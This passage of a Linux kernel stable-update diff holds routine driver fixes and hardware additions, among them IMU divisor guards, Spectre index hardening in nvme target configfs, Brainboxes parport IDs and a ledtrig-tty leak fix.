+-static const u32 JC_BTN_R	= BIT(6);
+-static const u32 JC_BTN_ZR	= BIT(7);
+-static const u32 JC_BTN_MINUS	= BIT(8);
+-static const u32 JC_BTN_PLUS	= BIT(9);
+-static const u32 JC_BTN_RSTICK	= BIT(10);
+-static const u32 JC_BTN_LSTICK	= BIT(11);
+-static const u32 JC_BTN_HOME	= BIT(12);
+-static const u32 JC_BTN_CAP	= BIT(13); /* capture button */
+-static const u32 JC_BTN_DOWN	= BIT(16);
+-static const u32 JC_BTN_UP	= BIT(17);
+-static const u32 JC_BTN_RIGHT	= BIT(18);
+-static const u32 JC_BTN_LEFT	= BIT(19);
+-static const u32 JC_BTN_SR_L	= BIT(20);
+-static const u32 JC_BTN_SL_L	= BIT(21);
+-static const u32 JC_BTN_L	= BIT(22);
+-static const u32 JC_BTN_ZL	= BIT(23);
++#define JC_BTN_Y	 BIT(0)
++#define JC_BTN_X	 BIT(1)
++#define JC_BTN_B	 BIT(2)
++#define JC_BTN_A	 BIT(3)
++#define JC_BTN_SR_R	 BIT(4)
++#define JC_BTN_SL_R	 BIT(5)
++#define JC_BTN_R	 BIT(6)
++#define JC_BTN_ZR	 BIT(7)
++#define JC_BTN_MINUS	 BIT(8)
++#define JC_BTN_PLUS	 BIT(9)
++#define JC_BTN_RSTICK	 BIT(10)
++#define JC_BTN_LSTICK	 BIT(11)
++#define JC_BTN_HOME	 BIT(12)
++#define JC_BTN_CAP	 BIT(13) /* capture button */
++#define JC_BTN_DOWN	 BIT(16)
++#define JC_BTN_UP	 BIT(17)
++#define JC_BTN_RIGHT	 BIT(18)
++#define JC_BTN_LEFT	 BIT(19)
++#define JC_BTN_SR_L	 BIT(20)
++#define JC_BTN_SL_L	 BIT(21)
++#define JC_BTN_L	 BIT(22)
++#define JC_BTN_ZL	 BIT(23)
+ 
+ enum joycon_msg_type {
+ 	JOYCON_MSG_TYPE_NONE,
+@@ -859,14 +859,27 @@ static int joycon_request_calibration(struct joycon_ctlr *ctlr)
+  */
+ static void joycon_calc_imu_cal_divisors(struct joycon_ctlr *ctlr)
+ {
+-	int i;
++	int i, divz = 0;
+ 
+ 	for (i = 0; i < 3; i++) {
+ 		ctlr->imu_cal_accel_divisor[i] = ctlr->accel_cal.scale[i] -
+ 						ctlr->accel_cal.offset[i];
+ 		ctlr->imu_cal_gyro_divisor[i] = ctlr->gyro_cal.scale[i] -
+ 						ctlr->gyro_cal.offset[i];
++
++		if (ctlr->imu_cal_accel_divisor[i] == 0) {
++			ctlr->imu_cal_accel_divisor[i] = 1;
++			divz++;
++		}
++
++		if (ctlr->imu_cal_gyro_divisor[i] == 0) {
++			ctlr->imu_cal_gyro_divisor[i] = 1;
++			divz++;
++		}
+ 	}
++
++	if (divz)
++		hid_warn(ctlr->hdev, "inaccurate IMU divisors (%d)\n", divz);
+ }
+ 
+ static const s16 DFLT_ACCEL_OFFSET /*= 0*/;
+@@ -1095,16 +1108,16 @@ static void joycon_parse_imu_report(struct joycon_ctlr *ctlr,
+ 		    JC_IMU_SAMPLES_PER_DELTA_AVG) {
+ 			ctlr->imu_avg_delta_ms = ctlr->imu_delta_samples_sum /
+ 						 ctlr->imu_delta_samples_count;
+-			/* don't ever want divide by zero shenanigans */
+-			if (ctlr->imu_avg_delta_ms == 0) {
+-				ctlr->imu_avg_delta_ms = 1;
+-				hid_warn(ctlr->hdev,
+-					 "calculated avg imu delta of 0\n");
+-			}
+ 			ctlr->imu_delta_samples_count = 0;
+ 			ctlr->imu_delta_samples_sum = 0;
+ 		}
+ 
++		/* don't ever want divide by zero shenanigans */
++		if (ctlr->imu_avg_delta_ms == 0) {
++			ctlr->imu_avg_delta_ms = 1;
++			hid_warn(ctlr->hdev, "calculated avg imu delta of 0\n");
++		}
++
+ 		/* useful for debugging IMU sample rate */
+ 		hid_dbg(ctlr->hdev,
+ 			"imu_report: ms=%u last_ms=%u delta=%u avg_delta=%u\n",
+diff --git a/drivers/hwmon/corsair-psu.c b/drivers/hwmon/corsair-psu.c
+index 2210aa62e3d06..ec7f27a6ce016 100644
+--- a/drivers/hwmon/corsair-psu.c
++++ b/drivers/hwmon/corsair-psu.c
+@@ -837,7 +837,23 @@ static struct hid_driver corsairpsu_driver = {
+ 	.reset_resume	= corsairpsu_resume,
+ #endif
+ };
+-module_hid_driver(corsairpsu_driver);
++
++static int __init corsair_init(void)
++{
++	return hid_register_driver(&corsairpsu_driver);
++}
++
++static void __exit corsair_exit(void)
++{
++	hid_unregister_driver(&corsairpsu_driver);
++}
++
++/*
++ * With module_init() the driver would load before the HID bus when
++ * built-in, so use late_initcall() instead.
++ */
++late_initcall(corsair_init);
++module_exit(corsair_exit);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Wilken Gottwalt <wilken.gottwalt@posteo.net>");
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 0174fbf1a9637..d8e4d902b01ad 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -1032,7 +1032,7 @@ struct etmv4_drvdata {
+ 	u8				ctxid_size;
+ 	u8				vmid_size;
+ 	u8				ccsize;
+-	u8				ccitmin;
++	u16				ccitmin;
+ 	u8				s_ex_level;
+ 	u8				ns_ex_level;
+ 	u8				q_support;
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 016220ba0addd..8d8fa8e8afe04 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -342,9 +342,9 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 		return ret;
+ 
+ 	hisi_ptt->trace_irq = pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ);
+-	ret = devm_request_threaded_irq(&pdev->dev, hisi_ptt->trace_irq,
+-					NULL, hisi_ptt_isr, 0,
+-					DRV_NAME, hisi_ptt);
++	ret = devm_request_irq(&pdev->dev, hisi_ptt->trace_irq, hisi_ptt_isr,
++				IRQF_NOBALANCING | IRQF_NO_THREAD, DRV_NAME,
++				hisi_ptt);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to request irq %d, ret = %d\n",
+ 			hisi_ptt->trace_irq, ret);
+@@ -659,6 +659,9 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	if (event->attach_state & PERF_ATTACH_TASK)
++		return -EOPNOTSUPP;
++
+ 	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
+ 		return -ENOENT;
+ 
+diff --git a/drivers/i2c/busses/i2c-rk3x.c b/drivers/i2c/busses/i2c-rk3x.c
+index b31cf4f18f854..6aa4f1f062401 100644
+--- a/drivers/i2c/busses/i2c-rk3x.c
++++ b/drivers/i2c/busses/i2c-rk3x.c
+@@ -178,6 +178,7 @@ struct rk3x_i2c_soc_data {
+  * @clk: function clk for rk3399 or function & Bus clks for others
+  * @pclk: Bus clk for rk3399
+  * @clk_rate_nb: i2c clk rate change notify
++ * @irq: irq number
+  * @t: I2C known timing information
+  * @lock: spinlock for the i2c bus
+  * @wait: the waitqueue to wait for i2c transfer
+@@ -200,6 +201,7 @@ struct rk3x_i2c {
+ 	struct clk *clk;
+ 	struct clk *pclk;
+ 	struct notifier_block clk_rate_nb;
++	int irq;
+ 
+ 	/* Settings */
+ 	struct i2c_timings t;
+@@ -1087,13 +1089,18 @@ static int rk3x_i2c_xfer_common(struct i2c_adapter *adap,
+ 
+ 		spin_unlock_irqrestore(&i2c->lock, flags);
+ 
+-		rk3x_i2c_start(i2c);
+-
+ 		if (!polling) {
++			rk3x_i2c_start(i2c);
++
+ 			timeout = wait_event_timeout(i2c->wait, !i2c->busy,
+ 						     msecs_to_jiffies(WAIT_TIMEOUT));
+ 		} else {
++			disable_irq(i2c->irq);
++			rk3x_i2c_start(i2c);
++
+ 			timeout = rk3x_i2c_wait_xfer_poll(i2c);
++
++			enable_irq(i2c->irq);
+ 		}
+ 
+ 		spin_lock_irqsave(&i2c->lock, flags);
+@@ -1310,6 +1317,8 @@ static int rk3x_i2c_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	i2c->irq = irq;
++
+ 	platform_set_drvdata(pdev, i2c);
+ 
+ 	if (i2c->soc_data->calc_timings == rk3x_i2c_v0_calc_timings) {
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 8404286302b0c..e8011d70d0799 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -286,6 +286,7 @@ static const struct xpad_device {
+ 	{ 0x146b, 0x0604, "Bigben Interactive DAIJA Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOX360 },
+ 	{ 0x1532, 0x0a00, "Razer Atrox Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOXONE },
+ 	{ 0x1532, 0x0a03, "Razer Wildcat", 0, XTYPE_XBOXONE },
++	{ 0x1532, 0x0a29, "Razer Wolverine V2", 0, XTYPE_XBOXONE },
+ 	{ 0x15e4, 0x3f00, "Power A Mini Pro Elite", 0, XTYPE_XBOX360 },
+ 	{ 0x15e4, 0x3f0a, "Xbox Airflo wired controller", 0, XTYPE_XBOX360 },
+ 	{ 0x15e4, 0x3f10, "Batarang Xbox 360 controller", 0, XTYPE_XBOX360 },
+diff --git a/drivers/input/keyboard/atkbd.c b/drivers/input/keyboard/atkbd.c
+index 246958795f606..e1e4f1133296a 100644
+--- a/drivers/input/keyboard/atkbd.c
++++ b/drivers/input/keyboard/atkbd.c
+@@ -746,6 +746,44 @@ static void atkbd_deactivate(struct atkbd *atkbd)
+ 			ps2dev->serio->phys);
+ }
+ 
++#ifdef CONFIG_X86
++static bool atkbd_is_portable_device(void)
++{
++	static const char * const chassis_types[] = {
++		"8",	/* Portable */
++		"9",	/* Laptop */
++		"10",	/* Notebook */
++		"14",	/* Sub-Notebook */
++		"31",	/* Convertible */
++		"32",	/* Detachable */
++	};
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(chassis_types); i++)
++		if (dmi_match(DMI_CHASSIS_TYPE, chassis_types[i]))
++			return true;
++
++	return false;
++}
++
++/*
++ * On many modern laptops ATKBD_CMD_GETID may cause problems, on these laptops
++ * the controller is always in translated mode. In this mode mice/touchpads will
++ * not work. So in this case simply assume a keyboard is connected to avoid
++ * confusing some laptop keyboards.
++ *
++ * Skipping ATKBD_CMD_GETID ends up using a fake keyboard id. Using a fake id is
++ * ok in translated mode, only atkbd_select_set() checks atkbd->id and in
++ * translated mode that is a no-op.
++ */
++static bool atkbd_skip_getid(struct atkbd *atkbd)
++{
++	return atkbd->translated && atkbd_is_portable_device();
++}
++#else
++static inline bool atkbd_skip_getid(struct atkbd *atkbd) { return false; }
++#endif
++
+ /*
+  * atkbd_probe() probes for an AT keyboard on a serio port.
+  */
+@@ -775,12 +813,12 @@ static int atkbd_probe(struct atkbd *atkbd)
+  */
+ 
+ 	param[0] = param[1] = 0xa5;	/* initialize with invalid values */
+-	if (ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
++	if (atkbd_skip_getid(atkbd) || ps2_command(ps2dev, param, ATKBD_CMD_GETID)) {
+ 
+ /*
+- * If the get ID command failed, we check if we can at least set the LEDs on
+- * the keyboard. This should work on every keyboard out there. It also turns
+- * the LEDs off, which we want anyway.
++ * If the get ID command was skipped or failed, we check if we can at least set
++ * the LEDs on the keyboard. This should work on every keyboard out there.
++ * It also turns the LEDs off, which we want anyway.
+  */
+ 		param[0] = 0;
+ 		if (ps2_command(ps2dev, param, ATKBD_CMD_SETLEDS))
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index e43e93ac2798a..b6749af462620 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -183,6 +183,7 @@ static const char * const smbus_pnp_ids[] = {
+ 	"LEN009b", /* T580 */
+ 	"LEN0402", /* X1 Extreme Gen 2 / P1 Gen 2 */
+ 	"LEN040f", /* P1 Gen 3 */
++	"LEN0411", /* L14 Gen 1 */
+ 	"LEN200f", /* T450s */
+ 	"LEN2044", /* L470  */
+ 	"LEN2054", /* E480 */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 9c39553d30fa2..b585b1dab870e 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -360,6 +360,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_DRITEK)
+ 	},
++	{
++		/* Acer TravelMate P459-G2-M */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "TravelMate P459-G2-M"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Amoi M636/A737 */
+ 		.matches = {
+diff --git a/drivers/leds/trigger/ledtrig-tty.c b/drivers/leds/trigger/ledtrig-tty.c
+index 8ae0d2d284aff..3e69a7bde9284 100644
+--- a/drivers/leds/trigger/ledtrig-tty.c
++++ b/drivers/leds/trigger/ledtrig-tty.c
+@@ -168,6 +168,10 @@ static void ledtrig_tty_deactivate(struct led_classdev *led_cdev)
+ 
+ 	cancel_delayed_work_sync(&trigger_data->dwork);
+ 
++	kfree(trigger_data->ttyname);
++	tty_kref_put(trigger_data->tty);
++	trigger_data->tty = NULL;
++
+ 	kfree(trigger_data);
+ }
+ 
+diff --git a/drivers/md/Kconfig b/drivers/md/Kconfig
+index 662d219c39bf4..db0e97020256e 100644
+--- a/drivers/md/Kconfig
++++ b/drivers/md/Kconfig
+@@ -650,6 +650,7 @@ config DM_ZONED
+ 
+ config DM_AUDIT
+ 	bool "DM audit events"
++	depends on BLK_DEV_DM
+ 	depends on AUDIT
+ 	help
+ 	  Generate audit events for device-mapper.
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index e4564ca1f2434..f7783199f81d4 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,7 +36,6 @@
+  */
+ 
+ #include <linux/blkdev.h>
+-#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6833,18 +6832,7 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
+-
+-			/*
+-			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock
+-			 * seeing md_check_recovery() is needed to clear
+-			 * the flag when using mdmon.
+-			 */
+-			continue;
+ 		}
+-
+-		wait_event_lock_irq(mddev->sb_wait,
+-			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
+-			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index f60a16de565ed..0c694ab3c110c 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -6447,6 +6447,14 @@ static void tg3_dump_state(struct tg3 *tp)
+ 	int i;
+ 	u32 *regs;
+ 
++	/* If it is a PCI error, all registers will be 0xffff,
++	 * we don't dump them out, just report the error and return
++	 */
++	if (tp->pdev->error_state != pci_channel_io_normal) {
++		netdev_err(tp->dev, "PCI channel ERROR!\n");
++		return;
++	}
++
+ 	regs = kzalloc(TG3_REG_BLK_SIZE, GFP_ATOMIC);
+ 	if (!regs)
+ 		return;
+@@ -11184,7 +11192,8 @@ static void tg3_reset_task(struct work_struct *work)
+ 	rtnl_lock();
+ 	tg3_full_lock(tp, 0);
+ 
+-	if (tp->pcierr_recovery || !netif_running(tp->dev)) {
++	if (tp->pcierr_recovery || !netif_running(tp->dev) ||
++	    tp->pdev->error_state != pci_channel_io_normal) {
+ 		tg3_flag_clear(tp, RESET_TASK_PENDING);
+ 		tg3_full_unlock(tp);
+ 		rtnl_unlock();
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+index 49c7aa86faaa8..e129ee1020f0a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+@@ -59,11 +59,6 @@ static int loongson_dwmac_probe(struct pci_dev *pdev, const struct pci_device_id
+ 		return -ENODEV;
+ 	}
+ 
+-	if (!of_device_is_compatible(np, "loongson, pci-gmac")) {
+-		pr_info("dwmac_loongson_pci: Incompatible OF node\n");
+-		return -ENODEV;
+-	}
+-
+ 	plat = devm_kzalloc(&pdev->dev, sizeof(*plat), GFP_KERNEL);
+ 	if (!plat)
+ 		return -ENOMEM;
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 57a11ee05bc36..91b73e7a41134 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1381,7 +1381,7 @@ static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans,
+ 		 * if it is true then one of the handlers took the page.
+ 		 */
+ 
+-		if (reclaim) {
++		if (reclaim && txq) {
+ 			u16 sequence = le16_to_cpu(pkt->hdr.sequence);
+ 			int index = SEQ_TO_INDEX(sequence);
+ 			int cmd_index = iwl_txq_get_cmd_index(txq, index);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5b906dbb1096c..0c088db944706 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1511,7 +1511,8 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	if (id->ncap == 0) {
+ 		/* namespace not allocated or attached */
+ 		info->is_removed = true;
+-		return -ENODEV;
++		ret = -ENODEV;
++		goto error;
+ 	}
+ 
+ 	info->anagrpid = id->anagrpid;
+@@ -1529,8 +1530,10 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 		    !memchr_inv(ids->nguid, 0, sizeof(ids->nguid)))
+ 			memcpy(ids->nguid, id->nguid, sizeof(ids->nguid));
+ 	}
++
++error:
+ 	kfree(id);
+-	return 0;
++	return ret;
+ }
+ 
+ static int nvme_ns_info_from_id_cs_indep(struct nvme_ctrl *ctrl,
+@@ -1922,9 +1925,10 @@ static void nvme_update_disk_info(struct gendisk *disk,
+ 
+ 	/*
+ 	 * The block layer can't support LBA sizes larger than the page size
+-	 * yet, so catch this early and don't allow block I/O.
++	 * or smaller than a sector size yet, so catch this early and don't
++	 * allow block I/O.
+ 	 */
+-	if (ns->lba_shift > PAGE_SHIFT) {
++	if (ns->lba_shift > PAGE_SHIFT || ns->lba_shift < SECTOR_SHIFT) {
+ 		capacity = 0;
+ 		bs = (1 << 9);
+ 	}
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 118bf08a708b9..a892d679e3389 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -382,6 +382,11 @@ struct nvme_ctrl {
+ 	enum nvme_dctype dctype;
+ };
+ 
++static inline enum nvme_ctrl_state nvme_ctrl_state(struct nvme_ctrl *ctrl)
++{
++	return READ_ONCE(ctrl->state);
++}
++
+ enum nvme_iopolicy {
+ 	NVME_IOPOLICY_NUMA,
+ 	NVME_IOPOLICY_RR,
+diff --git a/drivers/nvme/target/configfs.c b/drivers/nvme/target/configfs.c
+index 6a2816f3b4e80..73ae16059a1cb 100644
+--- a/drivers/nvme/target/configfs.c
++++ b/drivers/nvme/target/configfs.c
+@@ -16,6 +16,7 @@
+ #endif
+ #include <crypto/hash.h>
+ #include <crypto/kpp.h>
++#include <linux/nospec.h>
+ 
+ #include "nvmet.h"
+ 
+@@ -508,6 +509,7 @@ static ssize_t nvmet_ns_ana_grpid_store(struct config_item *item,
+ 
+ 	down_write(&nvmet_ana_sem);
+ 	oldgrpid = ns->anagrpid;
++	newgrpid = array_index_nospec(newgrpid, NVMET_MAX_ANAGRPS);
+ 	nvmet_ana_group_enabled[newgrpid]++;
+ 	ns->anagrpid = newgrpid;
+ 	nvmet_ana_group_enabled[oldgrpid]--;
+@@ -1580,6 +1582,7 @@ static struct config_group *nvmet_ana_groups_make_group(
+ 	grp->grpid = grpid;
+ 
+ 	down_write(&nvmet_ana_sem);
++	grpid = array_index_nospec(grpid, NVMET_MAX_ANAGRPS);
+ 	nvmet_ana_group_enabled[grpid]++;
+ 	up_write(&nvmet_ana_sem);
+ 
+diff --git a/drivers/parport/parport_serial.c b/drivers/parport/parport_serial.c
+index 9f5d784cd95d5..3644997a83425 100644
+--- a/drivers/parport/parport_serial.c
++++ b/drivers/parport/parport_serial.c
+@@ -65,6 +65,10 @@ enum parport_pc_pci_cards {
+ 	sunix_5069a,
+ 	sunix_5079a,
+ 	sunix_5099a,
++	brainboxes_uc257,
++	brainboxes_is300,
++	brainboxes_uc414,
++	brainboxes_px263,
+ };
+ 
+ /* each element directly indexed from enum list, above */
+@@ -158,6 +162,10 @@ static struct parport_pc_pci cards[] = {
+ 	/* sunix_5069a */		{ 1, { { 1, 2 }, } },
+ 	/* sunix_5079a */		{ 1, { { 1, 2 }, } },
+ 	/* sunix_5099a */		{ 1, { { 1, 2 }, } },
++	/* brainboxes_uc257 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_is300 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_uc414 */  { 1, { { 3, -1 }, } },
++	/* brainboxes_px263 */	{ 1, { { 3, -1 }, } },
+ };
+ 
+ static struct pci_device_id parport_serial_pci_tbl[] = {
+@@ -277,6 +285,38 @@ static struct pci_device_id parport_serial_pci_tbl[] = {
+ 	{ PCI_VENDOR_ID_SUNIX, PCI_DEVICE_ID_SUNIX_1999, PCI_VENDOR_ID_SUNIX,
+ 	  0x0104, 0, 0, sunix_5099a },
+ 
++	/* Brainboxes UC-203 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0bc1,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0bc2,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes UC-257 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0861,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0862,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0863,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes UC-414 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0e61,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc414 },
++
++	/* Brainboxes UC-475 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0981,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0982,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc257 },
++
++	/* Brainboxes IS-300/IS-500 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0da0,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_is300 },
++
++	/* Brainboxes PX-263/PX-295 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x402c,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_px263 },
++
+ 	{ 0, } /* terminate list */
+ };
+ MODULE_DEVICE_TABLE(pci,parport_serial_pci_tbl);
+@@ -542,6 +582,30 @@ static struct pciserial_board pci_parport_serial_boards[] = {
+ 		.base_baud      = 921600,
+ 		.uart_offset	= 0x8,
+ 	},
++	[brainboxes_uc257] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 2,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_is300] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 1,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_uc414] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 4,
++		.base_baud	= 115200,
++		.uart_offset	= 8,
++	},
++	[brainboxes_px263] = {
++		.flags		= FL_BASE2,
++		.num_ports	= 4,
++		.base_baud	= 921600,
++		.uart_offset	= 8,
++	},
+ };
+ 
+ struct parport_serial_private {
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index c132839d99dc8..8765544bac35c 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4602,17 +4602,21 @@ static int pci_quirk_xgene_acs(struct pci_dev *dev, u16 acs_flags)
+  * But the implementation could block peer-to-peer transactions between them
+  * and provide ACS-like functionality.
+  */
+-static int  pci_quirk_zhaoxin_pcie_ports_acs(struct pci_dev *dev, u16 acs_flags)
++static int pci_quirk_zhaoxin_pcie_ports_acs(struct pci_dev *dev, u16 acs_flags)
+ {
+ 	if (!pci_is_pcie(dev) ||
+ 	    ((pci_pcie_type(dev) != PCI_EXP_TYPE_ROOT_PORT) &&
+ 	     (pci_pcie_type(dev) != PCI_EXP_TYPE_DOWNSTREAM)))
+ 		return -ENOTTY;
+ 
++	/*
++	 * Future Zhaoxin Root Ports and Switch Downstream Ports will
++	 * implement ACS capability in accordance with the PCIe Spec.
++	 */
+ 	switch (dev->device) {
+ 	case 0x0710 ... 0x071e:
+ 	case 0x0721:
+-	case 0x0723 ... 0x0732:
++	case 0x0723 ... 0x0752:
+ 		return pci_acs_ctrl_enabled(acs_flags,
+ 			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ 	}
+diff --git a/drivers/pinctrl/cirrus/Kconfig b/drivers/pinctrl/cirrus/Kconfig
+index 530426a74f751..b3cea8d56c4f6 100644
+--- a/drivers/pinctrl/cirrus/Kconfig
++++ b/drivers/pinctrl/cirrus/Kconfig
+@@ -1,7 +1,8 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ config PINCTRL_LOCHNAGAR
+ 	tristate "Cirrus Logic Lochnagar pinctrl driver"
+-	depends on MFD_LOCHNAGAR
++	# Avoid clash caused by MIPS defining RST, which is used in the driver
++	depends on MFD_LOCHNAGAR && !MIPS
+ 	select GPIOLIB
+ 	select PINMUX
+ 	select PINCONF
+diff --git a/drivers/pinctrl/pinctrl-cy8c95x0.c b/drivers/pinctrl/pinctrl-cy8c95x0.c
+index 68509a2301b8f..5abab6bc763ae 100644
+--- a/drivers/pinctrl/pinctrl-cy8c95x0.c
++++ b/drivers/pinctrl/pinctrl-cy8c95x0.c
+@@ -749,6 +749,8 @@ static int cy8c95x0_gpio_get_pincfg(struct cy8c95x0_pinctrl *chip,
+ 	ret = regmap_read(chip->regmap, reg, &reg_val);
+ 	if (reg_val & bit)
+ 		arg = 1;
++	if (param == PIN_CONFIG_OUTPUT_ENABLE)
++		arg = !arg;
+ 
+ 	*config = pinconf_to_config_packed(param, (u16)arg);
+ out:
+@@ -857,7 +859,7 @@ static int cy8c95x0_setup_gpiochip(struct cy8c95x0_pinctrl *chip)
+ 	gc->get_direction = cy8c95x0_gpio_get_direction;
+ 	gc->get_multiple = cy8c95x0_gpio_get_multiple;
+ 	gc->set_multiple = cy8c95x0_gpio_set_multiple;
+-	gc->set_config = gpiochip_generic_config,
++	gc->set_config = gpiochip_generic_config;
+ 	gc->can_sleep = true;
+ 	gc->add_pin_ranges = cy8c95x0_add_pin_ranges;
+ 
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index c5e4e35c8d204..8e2b07ed2ce94 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -73,10 +73,10 @@ struct intel_vbtn_priv {
+ 	bool wakeup_mode;
+ };
+ 
+-static void detect_tablet_mode(struct platform_device *device)
++static void detect_tablet_mode(struct device *dev)
+ {
+-	struct intel_vbtn_priv *priv = dev_get_drvdata(&device->dev);
+-	acpi_handle handle = ACPI_HANDLE(&device->dev);
++	struct intel_vbtn_priv *priv = dev_get_drvdata(dev);
++	acpi_handle handle = ACPI_HANDLE(dev);
+ 	unsigned long long vgbs;
+ 	acpi_status status;
+ 	int m;
+@@ -89,6 +89,8 @@ static void detect_tablet_mode(struct platform_device *device)
+ 	input_report_switch(priv->switches_dev, SW_TABLET_MODE, m);
+ 	m = (vgbs & VGBS_DOCK_MODE_FLAG) ? 1 : 0;
+ 	input_report_switch(priv->switches_dev, SW_DOCK, m);
++
++	input_sync(priv->switches_dev);
+ }
+ 
+ /*
+@@ -134,7 +136,7 @@ static int intel_vbtn_input_setup(struct platform_device *device)
+ 	priv->switches_dev->id.bustype = BUS_HOST;
+ 
+ 	if (priv->has_switches) {
+-		detect_tablet_mode(device);
++		detect_tablet_mode(&device->dev);
+ 
+ 		ret = input_register_device(priv->switches_dev);
+ 		if (ret)
+@@ -198,6 +200,9 @@ static void notify_handler(acpi_handle handle, u32 event, void *context)
